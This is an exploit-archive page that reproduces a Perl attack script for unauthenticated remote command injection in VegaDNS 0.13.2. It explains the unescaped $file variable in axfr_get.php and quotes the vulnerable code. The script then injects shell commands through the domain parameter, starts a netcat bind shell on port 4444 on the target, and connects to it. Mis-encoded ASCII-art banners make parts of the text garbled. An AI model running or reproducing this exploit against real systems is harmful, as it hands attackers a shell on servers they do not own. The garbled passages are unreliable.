Home / exploits VegaDNS 0.13.2 - Remote Command Injection
Posted on 30 November -0001
<HTML><HEAD><TITLE>VegaDNS 0.13.2 - Remote Command Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>#!/usr/bin/perl To all the people with mad skills who share their knowledge: TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO, mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan, lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil, laughing_mantis, g0tm1k, nmrc, and many many more.... };$a=qq^ VegaDNS is a tinydns administration tool written in PHP to allow easy administration of DNS records through a web browser. -- http://www.vegadns.org The file axfr_get.php allows unauthenticated access and fails to correctly apply input escaping to all variables that is based on user input. This allows an attacker to inject shell syntax constructs to take control of the command execution. The following code from axfr_get.php shows how the variable $file becomes tainted trough the $domain variable which is tainted from direct user input. The application tries to prevent this by escaping the $domain and $hostname variables, but fails to escape the $file variable. ---------------------------cut--------------------------- * NOTE: * This functionality ONLY exists outside of the main application * because tcplient kept dying fatally due to file descriptor 7 * being unavailable, which only occurs AFTER session_start() is * called. * */ require_once 'src/config.php'; // CHECKS // Make sure the hostname was given if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") { echo "ERROR: no hostname given "; exit; } // Make sure that some domains were given if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") { echo "ERROR: no domain was supplied "; exit; } $domain = $_REQUEST['domain']; $hostname = $_REQUEST['hostname']; $rand = rand(); $file = "/tmp/$domain.$rand"; $command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1"; exec($command, $out); ---------------------------end--------------------------- ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ ██╔â•â•â•â•â•â•šâ–ˆâ–ˆâ•—██╔â•â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—██║ ██╔â•â•â•â–ˆâ–ˆâ•—██║╚â•â•â–ˆâ–ˆâ•”â•â•â• █████╗ ╚███╔╠██████╔â•â–ˆâ–ˆâ•‘ ██║ ██║██║ ██║ ██╔â•â•â• ██╔██╗ ██╔â•â•â•â• ██║ ██║ ██║██║ ██║ ███████╗██╔╠██╗██║ ███████╗╚██████╔â•â–ˆâ–ˆâ•‘ ██║ â•šâ•â•â•â•â•â•â•â•šâ•â• â•šâ•â•â•šâ•â• â•šâ•â•â•â•â•â•â• â•šâ•â•â•â•â•â• â•šâ•â• â•šâ•â• ^; print "$izd "." " x 17 . "VegaDNS pre-auth RCE exploit by @Wireghoul "; print " "."=" x 50 ."[justanotherhacker.com]== "; &usage if ($ARGV[0] !~ m!.+://([^/:]+)!); $h=$1; print " . . . Locating netcat "; $cmd='which+nc'; $t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev"; $z=`curl -s -k '$t'`; if ($z !~ m{/nc}) { print " ! ! ! netcat not found! Manual exploitation required: "; print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b "; exit 1; } print " . . . netcat found: $z "; print " . . . Performing IZUNA DROP! "; # ← · ↑ · → · ↓ · <img src="https://s.w.org/images/core/emoji/2/svg/2196.svg" alt="↖" class="emoji" draggable="false"> · <img src="https://s.w.org/images/core/emoji/2/svg/2197.svg" alt="↗" class="emoji" draggable="false"> · <img src="https://s.w.org/images/core/emoji/2/svg/2198.svg" alt="↘" class="emoji" draggable="false"> · <img src="https://s.w.org/images/core/emoji/2/svg/2199.svg" alt="↙" class="emoji" draggable="false"> print " ↓ ↓ ↑ *k* → → *p* "; $cmd="$z+-e+/bin/sh+-lp+4444"; $t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev"; $z=`curl -m 3 -s -k '$t &'`; print $vg." "; print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444 "; system("nc -v $h 4444"); sub usage { print "Usage $0 http://host/path/to/vegadns $ARGV[0]"; exit;</BODY></HTML>